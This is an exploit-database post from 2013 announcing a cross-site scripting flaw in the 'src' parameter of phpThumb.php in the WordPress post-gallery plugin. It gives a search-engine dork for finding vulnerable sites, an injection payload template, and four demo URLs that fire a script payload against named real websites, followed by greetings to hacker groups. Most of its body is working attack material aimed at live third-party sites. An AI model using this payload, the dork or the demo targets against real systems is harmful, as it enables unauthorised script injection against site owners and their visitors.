Wordpress post-gallery Plugin Xss vulnerabilities

2013-08-24 14:22:35
Inviato da: irist.ir

#################################

# Iranian Exploit DataBase Forum

# http://iedb.ir/acc

# http://iedb.ir

#################################

# Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/post-gallery/thirdparty/phpthumb/

#################################

# Exploit :

# http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]

# Dem0 :

http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>
http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F??iD - Medrik - Achraf - Dj.TiniVini

# B3hz4d - C0dex - Beni_Vanda & All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-411.html

#################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.